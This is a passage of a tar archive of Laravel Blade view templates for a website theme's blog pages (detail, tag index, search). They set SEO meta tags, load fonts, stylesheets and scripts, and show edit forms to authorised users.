$blog->title }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta name="description" content="@if (!empty($blog->meta_description)) {{ $blog->meta_description }} @elseif (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta name="keywords" content="@if (!empty($blog->meta_keyword)) {{ $blog->meta_keyword }} @elseif (!empty($page_builder->meta_keyword)) {{ $page_builder->meta_keyword }} @elseif (isset($seo)){{ $seo->meta_keyword }} @endif"> <meta name="author" content="elsecolor"> <meta property="fb:app_id" content="@if (isset($seo)){{ $seo->fb_app_id }} @endif"> <meta property="og:title" content="@if (!empty($blog->title)) {{ $blog->title }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="og:url" content="@if (isset($seo) || isset($page_builder)){{ url()->current() }} @endif"> <meta property="og:description" content="@if (!empty($blog->meta_description)) {{ $blog->meta_description }} @elseif (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta property="og:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta itemprop="image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="og:type" content="website"> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="twitter:title" content="@if (!empty($blog->title)) {{ $blog->title }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="twitter:description" content="@if (!empty($blog->meta_description)) {{ $blog->meta_description }} @elseif (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <!-- CSRF Token --> <meta name="csrf-token" content="{{ csrf_token() }}"> <!-- Title --> <title>@if (!empty($blog->title)) {{ $blog->title }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)) {{ $seo->meta_title }} @endif</title> @if (!empty($favicon->favicon_image)) <!-- Favicon --> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" /> @else <!-- Favicon --> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" /> @endif <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> @isset ($font) <!-- Google Fonts --> <link href="{{ $font->text_font_link }}" rel="stylesheet"> <link href="{{ $font->title_font_link }}" rel="stylesheet"> @else <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&display=swap" rel="stylesheet"> <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800&display=swap" rel="stylesheet"> @endisset <!--// Boostrap v5 //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/bootstrap.min.css') }}"> <!--// Magnific Popup //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/magnific.popup.min.css') }}"> <!--// Animate Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/animate.min.css') }}"> <!--// Vegas Slider Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/vegas.slider.min.css') }}"> <!--// Owl Carousel //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.min.css') }}"> <!--// Owl Carousel Default //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.default.min.css') }}"> <!--// Font Awesome //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/font_awesome/css/all.css') }}"> <!--// Flat Icons //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/flat_icons/flaticon.css') }}"> <style> :root { @isset ($color_option) @if ($color_option->color_option != 0) --main-color: {{ $color_option->main_color }}; --secondary-color: {{ $color_option->secondary_color }}; --scroll-button-color: {{ $color_option->scroll_button_color }}; --bottom-button-color: {{ $color_option->bottom_button_color }}; --bottom-button-hover-color: {{ $color_option->bottom_button_hover_color }}; --side-button-color: {{ $color_option->side_button_color }}; @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endif @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endisset @isset ($font) --title-font:@php echo html_entity_decode($font->title_font_family); @endphp; --text-font: @php echo html_entity_decode($font->text_font_family); @endphp; @else --title-font: 'Poppins', sans-serif; --text-font: 'Roboto', sans-serif; @endisset } </style> <!--// Theme Main Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/css/style.css') }}"> <!--// Theme Color Css //--> <!-- helper style css file --> <link rel="stylesheet" href="{{ asset('assets/frontend/css/helper-style.css') }}"> <style> #counters { background-image: url({{ asset('uploads/img/dummy/bg/counter-bg.png') }}); } </style> @if (isset($google_analytic)) <!-- Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id={{ $google_analytic->google_analytic }}"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', '{{ $google_analytic->google_analytic }}'); </script> @endif @livewireStyles </head> <body data-bs-spy="scroll" data-bs-target="#fixedNavbar" @if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) class="rtl-mode" @endif @elseif (isset($language)) @if ($language->direction == 1) class="rtl-mode" @endif @endif > <!--// Page Wrapper Start //--> <div class="page-wrapper" id="wrapper"> @include('frontend.sections.header.header-style1') <!--// Main Area Start //--> <main class="main-area"> @include('frontend.sections.breadcrumb.breadcrumb-style1') @include('frontend.blog.blog-detail-show') @include('frontend.sections.footer.footer-style1') </main> <!--// Main Area End //--> <a href="#" class="scroll-top-btn" data-scroll-goto="1"> <i class="fa fa-arrow-up"></i> </a> <!--// .scroll-top-btn // --> @include('frontend.sections.preloader.preloader') </div> <!--// Page Wrapper End //--> @include('frontend.sections.widget.bottom-style1') @include('frontend.sections.widget.side-style1') <!--// JQuery //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.min.js') }}"></script> <!--// Bootstrap //--> <script src="{{ asset('assets/frontend/vendor/js/bootstrap.min.js') }}"></script> <!--// Images Loaded Js //--> <script src="{{ asset('assets/frontend/vendor/js/images.loaded.min.js') }}"></script> <!--// Wow Js //--> <script src="{{ asset('assets/frontend/vendor/js/wow.min.js') }}"></script> <!--// Magnific Popup //--> <script src="{{ asset('assets/frontend/vendor/js/magnific.popup.min.js') }}"></script> <!--// Waypoint Js //--> <script src="{{ asset('assets/frontend/vendor/js/waypoint.min.js') }}"></script> <!--// Counter Up Js //--> <script src="{{ asset('assets/frontend/vendor/js/counter.up.min.js') }}"></script> <!--// JQuery Easing Functions //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.easing.min.js') }}"></script> <!--// Owl Carousel //--> <script src="{{ asset('assets/frontend/vendor/js/owl.carousel.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/validate.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/custom.select.plugin.js') }}"></script> <!--// Scroll It //--> <script src="{{ asset('assets/frontend/vendor/js/scrollit.min.js') }}"></script> <!--// Isotope Js //--> <script src="{{ asset('assets/frontend/vendor/js/isotope.min.js') }}"></script> <!--// Main Js //--> <script src="{{ asset('assets/frontend/js/main.js') }}"></script> @isset ($tawk_to) <script> @php echo html_entity_decode($tawk_to->tawk_to); @endphp </script> @endisset @livewireScripts </body> </html> ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/blog/tag-index.blade.php�������������������������������������������������������������0000644�����������������00000024513�14765366572�0014134 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!DOCTYPE html> <html dir="@if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) {{ __('rtl') }} @else {{ __('ltr') }} @endif @else {{ __('ltr') }} @endif" lang="@if (session()->has('language_code_from_dropdown')){{ str_replace('_', '-', session()->get('language_code_from_dropdown')) }}@else{{ str_replace('_', '-', $language->language_code) }}@endif"> <head> <!-- Meta Tags --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <meta name="title" content="@if (!empty($tag_name)) {{ $tag_name }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta name="description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta name="keywords" content="@if (!empty($page_builder->meta_keyword)) {{ $page_builder->meta_keyword }} @elseif (isset($seo)){{ $seo->meta_keyword }} @endif"> <meta name="author" content="elsecolor"> <meta property="fb:app_id" content="@if (isset($seo)){{ $seo->fb_app_id }} @endif"> <meta property="og:title" content="@if (!empty($tag_name)) {{ $tag_name }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="og:url" content="@if (isset($seo) || isset($page_builder)){{ url()->current() }} @endif"> <meta property="og:description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta property="og:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta itemprop="image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="og:type" content="website"> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="twitter:title" content="@if (!empty($tag_name)) {{ $tag_name }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="twitter:description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <!-- CSRF Token --> <meta name="csrf-token" content="{{ csrf_token() }}"> <!-- Title --> <title>@if (!empty($tag_name)) {{ $tag_name }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)) {{ $seo->meta_title }} @endif</title> @if (!empty($favicon->favicon_image)) <!-- Favicon --> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" /> @else <!-- Favicon --> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" /> @endif <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> @isset ($font) <!-- Google Fonts --> <link href="{{ $font->text_font_link }}" rel="stylesheet"> <link href="{{ $font->title_font_link }}" rel="stylesheet"> @else <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&display=swap" rel="stylesheet"> <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800&display=swap" rel="stylesheet"> @endisset <!--// Boostrap v5 //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/bootstrap.min.css') }}"> <!--// Magnific Popup //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/magnific.popup.min.css') }}"> <!--// Animate Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/animate.min.css') }}"> <!--// Vegas Slider Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/vegas.slider.min.css') }}"> <!--// Owl Carousel //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.min.css') }}"> <!--// Owl Carousel Default //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.default.min.css') }}"> <!--// Font Awesome //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/font_awesome/css/all.css') }}"> <!--// Flat Icons //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/flat_icons/flaticon.css') }}"> <style> :root { @isset ($color_option) @if ($color_option->color_option != 0) --main-color: {{ $color_option->main_color }}; --secondary-color: {{ $color_option->secondary_color }}; --scroll-button-color: {{ $color_option->scroll_button_color }}; --bottom-button-color: {{ $color_option->bottom_button_color }}; --bottom-button-hover-color: {{ $color_option->bottom_button_hover_color }}; --side-button-color: {{ $color_option->side_button_color }}; @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endif @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endisset @isset ($font) --title-font:@php echo html_entity_decode($font->title_font_family); @endphp; --text-font: @php echo html_entity_decode($font->text_font_family); @endphp; @else --title-font: 'Poppins', sans-serif; --text-font: 'Roboto', sans-serif; @endisset } </style> <!--// Theme Main Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/css/style.css') }}"> <!--// Theme Color Css //--> <!-- helper style css file --> <link rel="stylesheet" href="{{ asset('assets/frontend/css/helper-style.css') }}"> <style> #counters { background-image: url({{ asset('uploads/img/dummy/bg/counter-bg.png') }}); } </style> @if (isset($google_analytic)) <!-- Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id={{ $google_analytic->google_analytic }}"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', '{{ $google_analytic->google_analytic }}'); </script> @endif @livewireStyles </head> <body data-bs-spy="scroll" data-bs-target="#fixedNavbar" @if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) class="rtl-mode" @endif @elseif (isset($language)) @if ($language->direction == 1) class="rtl-mode" @endif @endif > <!--// Page Wrapper Start //--> <div class="page-wrapper" id="wrapper"> @include('frontend.sections.header.header-style1') <!--// Main Area Start //--> <main class="main-area"> @include('frontend.sections.breadcrumb.breadcrumb-style1') @include('frontend.blog.tag-index-list') @include('frontend.sections.footer.footer-style1') </main> <!--// Main Area End //--> <a href="#" class="scroll-top-btn" data-scroll-goto="1"> <i class="fa fa-arrow-up"></i> </a> <!--// .scroll-top-btn // --> @include('frontend.sections.preloader.preloader') </div> <!--// Page Wrapper End //--> @include('frontend.sections.widget.bottom-style1') @include('frontend.sections.widget.side-style1') <!--// JQuery //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.min.js') }}"></script> <!--// Bootstrap //--> <script src="{{ asset('assets/frontend/vendor/js/bootstrap.min.js') }}"></script> <!--// Images Loaded Js //--> <script src="{{ asset('assets/frontend/vendor/js/images.loaded.min.js') }}"></script> <!--// Wow Js //--> <script src="{{ asset('assets/frontend/vendor/js/wow.min.js') }}"></script> <!--// Magnific Popup //--> <script src="{{ asset('assets/frontend/vendor/js/magnific.popup.min.js') }}"></script> <!--// Waypoint Js //--> <script src="{{ asset('assets/frontend/vendor/js/waypoint.min.js') }}"></script> <!--// Counter Up Js //--> <script src="{{ asset('assets/frontend/vendor/js/counter.up.min.js') }}"></script> <!--// JQuery Easing Functions //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.easing.min.js') }}"></script> <!--// Owl Carousel //--> <script src="{{ asset('assets/frontend/vendor/js/owl.carousel.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/validate.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/custom.select.plugin.js') }}"></script> <!--// Scroll It //--> <script src="{{ asset('assets/frontend/vendor/js/scrollit.min.js') }}"></script> <!--// Isotope Js //--> <script src="{{ asset('assets/frontend/vendor/js/isotope.min.js') }}"></script> <!--// Main Js //--> <script src="{{ asset('assets/frontend/js/main.js') }}"></script> @isset ($tawk_to) <script> @php echo html_entity_decode($tawk_to->tawk_to); @endphp </script> @endisset @livewireScripts </body> </html> �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/blog/search-index-result-index.blade.php���������������������������������������������0000644�����������������00000020660�14765366572�0017246 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('blog check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif @if (is_countable($blogs_paginate_style) && count($blogs_paginate_style) > 0) <!--// Blog Section Start //--> <section class="section" id="blog"> <div class="container"> @if(Auth::user()) @can('blog check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row"> @foreach ($blogs_paginate_style as $item) <div class="col-lg-4 col-md-6"> @if(Auth::user()) @can('blog check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="blog.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="blog-item"> @if (!empty($item->section_image)) <div class="blog-img"> <a href="{{ route('default-blog-detail-show', ['slug' => $item->slug]) }}"> <img src="{{ asset('uploads/img/blog/thumbnail/'.$item->section_image) }}" alt="Blog image" class="img-fluid"> </a> </div> @else <div class="blog-img"> <a href="{{ route('default-blog-detail-show', ['slug' => $item->slug]) }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> @endif <div class="blog-body"> <div class="blog-meta"> <a href="#"> <span><i class="far fa-user"></i>@if ($item->type == "with_this_account") {{ $item->author_name }} @else {{ __('frontend.anonymous') }} @endif</span> </a> <a href="#"> <span><i class="far fa-bookmark"></i>{{ $item->category_name }}</span> </a> </div> <h5> <a href="{{ route('default-blog-detail-show', ['slug' => $item->slug]) }}">{{ $item->title }}</a> </h5> @if (!empty($item->short_description)) <p>{{ $item->short_description }}</p> @endif <a href="{{ route('default-blog-detail-show', ['slug' => $item->slug]) }}" class="blog-link"> {{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> @endforeach @unset ($item) </div> <div class="row mt-5"> <div class="col-xl-12"> <div class="easier-pagination-container"> {{ $blogs_paginate_style->links() }} </div> </div> </div> </div> </section> <!--// Blog Section End //--> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <!--// Blog Sidebar Section Start //--> <section class="section padding-minus-90" id="blog-sidebar-page"> <div class="container"> <div class="row"> <div class="col-lg-12"> <div class="widget-sidebar"> <div class="sidebar-widgets"> <h5 class="inner-header-title">{{ __('frontend.search') }}</h5> <form action="{{ route('default-blog-search-index') }}" method="POST"> @csrf <div class="blog-search-bar position-relative"> <input type="search" name="search" placeholder="{{ __('frontend.type_to_search') }}" class="search-form-control" required> <button type="submit" class="blog-search-btn"><span class="fa fa-search"></span></button> </div> </form> </div> </div> </div> </div> </div> </section> <!--// Blog Grid Sidebar End //--> @endif @endif @if(Auth::user()) @can('blog check') </div> <div class="easier-middle"> @php $modified_url = '/' @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="blog.index"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> </div> </div> @endcan @endif ��������������������������������������������������������������������������������views/frontend/blog/search-index.blade.php����������������������������������������������������������0000644�����������������00000024141�14765366572�0014623 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!DOCTYPE html> <html dir="@if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) {{ __('rtl') }} @else {{ __('ltr') }} @endif @else {{ __('ltr') }} @endif" lang="@if (session()->has('language_code_from_dropdown')){{ str_replace('_', '-', session()->get('language_code_from_dropdown')) }}@else{{ str_replace('_', '-', $language->language_code) }}@endif"> <head> <!-- Meta Tags --> <meta charset="utf-8"> <meta name="robots" content="noindex, nofollow"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <meta name="title" content="@if (isset($page_builder)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->site_name }} @endif"> <meta name="description" content="@if (isset($page_builder)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->site_description }} @endif"> <meta name="keywords" content="@if (isset($page_builder)) {{ $page_builder->meta_keyword }} @elseif (isset($seo)){{ $seo->site_keyword }} @endif"> <meta name="author" content="elsecolor"> <meta property="fb:app_id" content="@if (isset($seo)){{ $seo->fb_app_id }} @endif"> <meta property="og:title" content="@if (isset($page_builder)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->site_name }} @endif"> <meta property="og:url" content="@if (isset($seo) || isset($page_builder)){{ url()->current() }} @endif"> <meta property="og:description" content="@if (isset($page_builder)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->site_description }} @endif"> <meta property="og:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta itemprop="image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="og:type" content="website"> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="twitter:title" content="@if (isset($page_builder)) {{ $page_builder->breadcrumb_title }} @elseif (isset($seo)){{ $seo->site_name }} @endif"> <meta property="twitter:description" content="@if (isset($page_builder)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->site_description }} @endif"> <!-- CSRF Token --> <meta name="csrf-token" content="{{ csrf_token() }}"> <!-- Title --> <title>@if (isset($page_builder)) {{ $page_builder->meta_title }} @elseif (isset($seo)) - {{ $seo->site_name }} @endif</title> @if (!empty($favicon->favicon_image)) <!-- Favicon --> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" /> @else <!-- Favicon --> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" /> @endif <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> @isset ($font) <!-- Google Fonts --> <link href="{{ $font->text_font_link }}" rel="stylesheet"> <link href="{{ $font->title_font_link }}" rel="stylesheet"> @else <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&display=swap" rel="stylesheet"> <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800&display=swap" rel="stylesheet"> @endisset <!--// Boostrap v5 //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/bootstrap.min.css') }}"> <!--// Magnific Popup //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/magnific.popup.min.css') }}"> <!--// Animate Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/animate.min.css') }}"> <!--// Vegas Slider Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/vegas.slider.min.css') }}"> <!--// Owl Carousel //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.min.css') }}"> <!--// Owl Carousel Default //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.default.min.css') }}"> <!--// Font Awesome //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/font_awesome/css/all.css') }}"> <!--// Flat Icons //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/flat_icons/flaticon.css') }}"> <style> :root { @isset ($color_option) @if ($color_option->color_option != 0) --main-color: {{ $color_option->main_color }}; --secondary-color: {{ $color_option->secondary_color }}; --scroll-button-color: {{ $color_option->scroll_button_color }}; --bottom-button-color: {{ $color_option->bottom_button_color }}; --bottom-button-hover-color: {{ $color_option->bottom_button_hover_color }}; --side-button-color: {{ $color_option->side_button_color }}; @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endif @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endisset @isset ($font) --title-font:@php echo html_entity_decode($font->title_font_family); @endphp; --text-font: @php echo html_entity_decode($font->text_font_family); @endphp; @else --title-font: 'Poppins', sans-serif; --text-font: 'Roboto', sans-serif; @endisset } </style> <!--// Theme Main Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/css/style.css') }}"> <!--// Theme Color Css //--> <!-- helper style css file --> <link rel="stylesheet" href="{{ asset('assets/frontend/css/helper-style.css') }}"> <style> #counters { background-image: url({{ asset('uploads/img/dummy/bg/counter-bg.png') }}); } </style> @if (isset($google_analytic)) <!-- Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id={{ $google_analytic->google_analytic }}"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', '{{ $google_analytic->google_analytic }}'); </script> @endif @livewireStyles </head> <body data-bs-spy="scroll" data-bs-target="#fixedNavbar" @if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) class="rtl-mode" @endif @elseif (isset($language)) @if ($language->direction == 1) class="rtl-mode" @endif @endif > <!--// Page Wrapper Start //--> <div class="page-wrapper" id="wrapper"> @include('frontend.sections.header.header-style1') <!--// Main Area Start //--> <main class="main-area"> @include('frontend.sections.breadcrumb.breadcrumb-style1') @include('frontend.blog.search-index-result-index') @include('frontend.sections.footer.footer-style1') </main> <!--// Main Area End //--> <a href="#" class="scroll-top-btn" data-scroll-goto="1"> <i class="fa fa-arrow-up"></i> </a> <!--// .scroll-top-btn // --> @include('frontend.sections.preloader.preloader') </div> <!--// Page Wrapper End //--> @include('frontend.sections.widget.bottom-style1') @include('frontend.sections.widget.side-style1') <!--// JQuery //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.min.js') }}"></script> <!--// Bootstrap //--> <script src="{{ asset('assets/frontend/vendor/js/bootstrap.min.js') }}"></script> <!--// Images Loaded Js //--> <script src="{{ asset('assets/frontend/vendor/js/images.loaded.min.js') }}"></script> <!--// Wow Js //--> <script src="{{ asset('assets/frontend/vendor/js/wow.min.js') }}"></script> <!--// Magnific Popup //--> <script src="{{ asset('assets/frontend/vendor/js/magnific.popup.min.js') }}"></script> <!--// Waypoint Js //--> <script src="{{ asset('assets/frontend/vendor/js/waypoint.min.js') }}"></script> <!--// Counter Up Js //--> <script src="{{ asset('assets/frontend/vendor/js/counter.up.min.js') }}"></script> <!--// JQuery Easing Functions //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.easing.min.js') }}"></script> <!--// Owl Carousel //--> <script src="{{ asset('assets/frontend/vendor/js/owl.carousel.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/validate.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/custom.select.plugin.js') }}"></script> <!--// Scroll It //--> <script src="{{ asset('assets/frontend/vendor/js/scrollit.min.js') }}"></script> <!--// Isotope Js //--> <script src="{{ asset('assets/frontend/vendor/js/isotope.min.js') 